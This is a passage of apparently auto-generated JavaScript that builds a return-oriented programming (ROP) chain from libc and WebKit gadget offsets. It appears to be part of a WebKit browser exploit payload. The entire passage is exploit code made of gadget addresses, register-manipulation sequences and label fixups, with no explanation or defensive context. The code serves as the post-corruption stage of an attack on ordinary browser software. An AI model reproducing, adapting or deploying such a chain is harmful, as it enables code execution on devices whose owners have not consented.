webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1382:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+119088, //L1385
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1385:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+119144, //L1386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1386:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1388:
libc_base+144605, //pop rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+119280, //L1389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1389:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1391:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+119400, //L1394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+119384, //L1392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1392:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1394:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+119544, //L1397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+119512, //L1395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+119528, //L1396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1395:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1397:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+119616, //L1399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1399:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+119672, //L1400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1400:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+119768, //L1403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1402:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1403:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1404:
db([30, 0]); // 0x1e
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+119864, //L1405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+119880, //L1406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1405:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1406:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+119968, //L1408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1408:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120024, //L1409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1409:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+120096, //L1412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1412:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120152, //L1413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1413:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+120240, //L1415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1415:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1417:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+120360, //L1420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+120344, //L1418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1418:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1420:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120504, //L1423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+120472, //L1421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+120488, //L1422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1421:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1422:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1423:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+120576, //L1425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1425:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+120632, //L1426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1426:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+120728, //L1429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1428:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1429:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1430:
db([7, 0]); // 0x7
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+120824, //L1431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+120840, //L1432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1431:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1432:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+120928, //L1434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120984, //L1435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1435:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+121088, //L1437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1437:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1439:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+121208, //L1442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+121192, //L1440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1440:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1442:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+121352, //L1445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+121320, //L1443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+121336, //L1444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1443:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1445:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+121424, //L1447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1447:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+121480, //L1448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1448:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+121576, //L1451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1450:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1451:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1452:
db([31, 0]); // 0x1f
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+121672, //L1453
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+121688, //L1454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1453:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1454:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+121776, //L1456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1456:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+121832, //L1457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1457:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+121904, //L1460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1460:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+121960, //L1461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1461:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1463:
libc_base+759608, //pop rax
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+122096, //L1464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1464:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1466:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+122216, //L1469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+122200, //L1467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1467:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1469:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+122360, //L1472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+122328, //L1470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+122344, //L1471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1470:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1471:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1472:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+122432, //L1474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1474:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+122488, //L1475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1475:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+122584, //L1478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1477:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1478:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1479:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+122680, //L1480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+122696, //L1481
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1480:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1481:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+122784, //L1483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1483:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+122840, //L1484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1484:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+122912, //L1487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+122968, //L1488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1488:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+123056, //L1490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1490:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1492:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+123176, //L1495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+123160, //L1493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1493:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1495:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+123320, //L1498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+123288, //L1496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+123304, //L1497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1496:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1497:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1498:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+123392, //L1500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+123448, //L1501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1501:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+123544, //L1504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1503:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1504:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1505:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+123640, //L1506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+123656, //L1507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1506:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1507:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+123744, //L1509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1509:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+123800, //L1510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1510:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+123904, //L1512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1512:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1514:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+124024, //L1517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+124008, //L1515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1515:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1517:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+124168, //L1520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+124136, //L1518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+124152, //L1519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1518:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1519:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1520:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+124240, //L1522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1522:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+124296, //L1523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1523:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+124392, //L1526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1525:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1526:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1527:
db([33, 0]); // 0x21
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+124488, //L1528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+124504, //L1529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1528:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1529:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+124592, //L1531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1531:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+124648, //L1532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1532:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+124720, //L1535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1535:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+124776, //L1536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1536:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1538:
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
